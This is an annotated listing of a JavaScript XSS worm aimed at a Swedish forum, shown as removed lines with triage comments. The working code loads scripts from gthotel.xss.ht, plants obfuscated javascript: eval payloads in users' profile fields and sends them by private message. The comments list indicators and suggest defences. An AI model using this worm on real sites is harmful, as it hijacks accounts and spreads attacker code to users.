// Page-scraping setup used by the self-invoking function further down. Everything here
// reads the DOM of whatever page the script runs in; none of it is validated.
- var html = document.documentElement.outerHTML;
// Takes a value from the serialized markup at fixed split positions around the
// 'return follow(this);' handler text. It is later compared against names scraped from
// users.php, so it is presumably the viewer's own user name -- confirm against the
// site's markup. Any change to that markup makes these index lookups throw.
- var currentUser = html.split('return follow(this);')[2].split('">')[2].split('<')[0];
// Filled with names scraped from users.php inside the users.php success callback.
- var users = [];
// NOTE(review): not assigned at this scope anywhere in this listing; every callback
// below declares its own `data` parameter, which shadows this variable.
- var data;
/**
 * Escapes regular-expression metacharacters so the input can be passed to
 * `new RegExp()` and matched as literal text. In this listing it is applied to
 * URLs taken from profile fields before they are used as a global search pattern.
 *
 * @param {string} str - Text to escape.
 * @returns {string} `str` with each of . * + ? ^ $ { } ( ) | [ ] \ preceded by a backslash.
 */
- function escapeRegExp(str) {
- return str.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
- }
// Self-invoking routine. Triage summary, taken only from the code below:
//   1. Injects jQuery 1.7.1 from ajax.googleapis.com and polls until window.jQuery exists.
//   2. Loads a script from the third-party host gthotel.xss.ht into the current page.
//   3. GETs users.php and settings.php via relative URLs (same origin as the page the
//      script runs in) and scrapes the returned HTML.
//   4. Rewrites every [url=...] target found in two profile textareas and POSTs the
//      result back to settings.php, so the modified markup is stored in the profile of
//      whoever is viewing the page.
//   5. POSTs a private message containing a scripted [url=...] link to messages.php.
// Indicators visible in this listing: the host gthotel.xss.ht, stored fields or messages
// containing "[url=jav", and the message subject "Vill någon rollspela?".
// Defensive takeaways: the BBCode [url] handler should accept only an allowlist of
// schemes (http/https) after removing whitespace and control characters from the value,
// and a Content-Security-Policy that restricts script sources and disallows inline
// script would stop both the external script load and the link payloads.
- (function() {
// NOTE(review): startingTime is never read in this listing.
- var startingTime = new Date().getTime();
// Adds a <script> element to <head> so that jQuery becomes available on the page.
- var script = document.createElement("SCRIPT");
- script.src = 'https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js';
- script.type = 'text/javascript';
- document.getElementsByTagName("head")[0].appendChild(script);
// Polls every 20 ms until window.jQuery is defined, then hands it to the callback.
// There is no timeout: if the script never loads, the polling continues indefinitely.
- var checkReady = function(callback) {
- if (window.jQuery) {
- callback(jQuery);
- }
- else {
- window.setTimeout(function() { checkReady(callback); }, 20);
- }
- };
- checkReady(function($) {
- $(function() {
// Fetches and executes a script from an external host (protocol-relative URL).
// Outbound requests to this host from forum pages are a detection signal.
- $.getScript("//gthotel.xss.ht");
// First request: fetch the user listing page as text for scraping.
- $.ajax({
- url: 'users.php',
- processData: false,
- cache: false,
- type: 'GET',
- contentType: false,
- beforeSend: function (x) {
- if (x && x.overrideMimeType) {
- x.overrideMimeType("multipart/form-data");
- }
- },
- mimeType: 'multipart/form-data',
- success: function (data) {
// Reads five entries at fixed split positions (5 through 9) of the 'user.php?id=' links
// and keeps those that differ from currentUser (loose != comparison).
- for (var i = 0; i < 5; i++) {
- var userindex = data.split('<a href="user.php?id=')[5+i].split('<span')[1].split('">')[1].split('<')[0];
- if (userindex != currentUser) {
- users.push(userindex);
- }
- }
- console.log(users);
// Second request: read the viewer's own settings page to obtain the current contents
// of two <textarea> fields.
- $.get(
- "settings.php", function(data) {
// signCont (third textarea) is later submitted as 'forum_signature';
// signCont2 (second textarea) is later submitted as 'description'.
- var signCont = data.split('<textarea')[2].split('">')[1].split('<')[0];
- var signCont2 = data.split('<textarea')[1].split('">')[1].split('<')[0];
// Number of BBCode [url=...] tags in each field.
- var count = (signCont.match(/\[url=/g) || []).length;
- var count2 = (signCont2.match(/\[url=/g) || []).length;
// For each [url=...] tag, every occurrence of its target in the field is replaced with a
// string made of a 'jav ascript://' prefix, the original URL, an encoded newline (%0a)
// and an eval() that appends a <script> element pointing at the external host.
// NOTE(review): the whitespace inside the scheme name is presumably there to get past a
// filter that looks for the literal scheme -- confirm against the forum's BBCode parser.
- for (var i = 0; i < count; i++) {
- var currentURL = signCont.split("[url=")[i+1].split("]")[0];
- var re = new RegExp(escapeRegExp(currentURL), "g");
- var payload = "jav ascript://" + currentURL + "%0aeval('var a=document.createElement(\'script\');a.src=\'https://gthotel.xss.ht\';document.body.appendChild(a)');";
- signCont = signCont.replace(re, payload);
- }
// Same rewrite applied to the second field.
- for (var i = 0; i < count2; i++) {
- var currentURL2 = signCont2.split("[url=")[i+1].split("]")[0];
- var re = new RegExp(escapeRegExp(currentURL2), "g");
- var payload = "jav ascript://" + currentURL2 + "%0aeval('var a=document.createElement(\'script\');a.src=\'https://gthotel.xss.ht\';document.body.appendChild(a)');";
- signCont2 = signCont2.replace(re, payload);
- }
// Reuses the callback's `data` parameter to hold the form body. Only three fields are
// sent: the two rewritten textareas and 'settings' = 'Uppdatera' (presumably the value
// of the form's submit button -- confirm against settings.php).
- data = new FormData();
- data.append('forum_signature', signCont);
- data.append('description', signCont2);
- data.append('settings', 'Uppdatera');
// Writes the modified fields back to the viewer's profile. This is the step that makes
// the injected markup persistent; when scoping an incident, audit stored
// forum_signature and description values for [url=...] targets that are not http/https.
- $.ajax({
- url: 'settings.php',
- data: data,
- processData: false,
- cache: false,
- type: 'POST',
- contentType: false,
- beforeSend: function (x) {
- if (x && x.overrideMimeType) {
- x.overrideMimeType("multipart/form-data");
- }
- },
- mimeType: 'multipart/form-data',
- success: function (data) {
// After the profile update succeeds, sends a private message whose body is a [url=...]
// tag with a scripted target and a forum-topic URL as the visible link text. The request
// body names two literal recipients ('maxx' and 'undefined').
- $.post("messages.php?ajax=1", "ajax=1&font=default&name=" + encodeURIComponent("Vill någon rollspela?") + "&send=Skicka&text=" + "[url=jav%09ascript:eval('var a=document.createElement(\'script\');a.src=\'https://gthotel.xss.ht\';document.body.appendChild(a)');]https://www.mugglarportalen.se/#forum.php?topic=50591[/url]" + "&users[0]=maxx&users[1]=undefined");
// The $.post statement ends at the semicolon above, so the next four lines form a
// separate expression whose value is discarded; they are not part of the request.
- + encodeURIComponent(users[1]) + "&users[2]="
- + encodeURIComponent(users[2]) + "&users[3]="
- + encodeURIComponent(users[3]) + "&users[4]="
- + encodeURIComponent(users[4]);
- }
- }
- )}
- );
- }
- });
- });
- });
- })();